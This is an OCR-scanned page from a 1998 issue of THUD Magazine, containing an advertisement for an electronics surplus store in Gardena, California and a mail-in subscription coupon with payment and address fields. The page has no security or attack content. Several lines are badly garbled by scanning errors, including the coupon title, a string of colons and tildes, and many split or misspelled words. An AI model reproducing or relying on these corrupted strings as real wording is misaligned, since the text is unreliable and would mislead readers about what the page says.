Electronics and Computers Surplus City (ECSC)
1490 W. Artesia Blvd, Gardena, CA 90248
(800) 543-0540, (310) 217-8021 FAX:(310) 217-0950 WI~ WAN'I' YOUR SURI)I.US IN,TEN'I'ORY!
Store Hours: Mon . through Sat., 10 AM - 6 PM
http://www.eio.com/
SUBSCRIBE
TO DAYI (That means NOWI)
.----------------- - - --------~------
THUD NI§d2i11B Suo-fdriflilJl1 Cdrt! V112
I We suggest that yo u photocopy th is coupon , fill it out and send it to us in the mail with you r payment op t io n.
Il I:::::: ::~~ ~: :~ ~::~ :~~:~~:~::~~ ~: i~~g ~:~:~:~: l: ~~:~:~:~ :::~::l :~~ :~~
I( ) Please send me a 3 year subscript ion of THUD Magaz ine (12 quarterly issues) fo r $54 (10% discount )
I ( ) My Check is enclosed ( ) Money Orde r enc losed ( ) Bill my Cred it Card :
( ) MasterCa rd ( ) Visa ( ) Ame ric an Express ( ) Discover
Name : _ Company: _
Address: City: St: Zip : _
Card#: Exp Qate: _ Phone: _
Signature: _ DL#: (Required for credit card purchases)
THUD Magazine
E-Mail Address: _ P.O. Box 2521
Cyppress, CA 90630
._------------------ ---------------
Please enclose this card in an envelope fo r privacy. Copyrig ht 1998 THUD Magazine. . Canadian orders add $4 U.S. per year. Other for eign orders add $15 U.S.
per ye ar. Please allow 6-8 weeks f or delivery' offirs t issue.
THUD Volume 1 Issue 2 - Fall 1998 59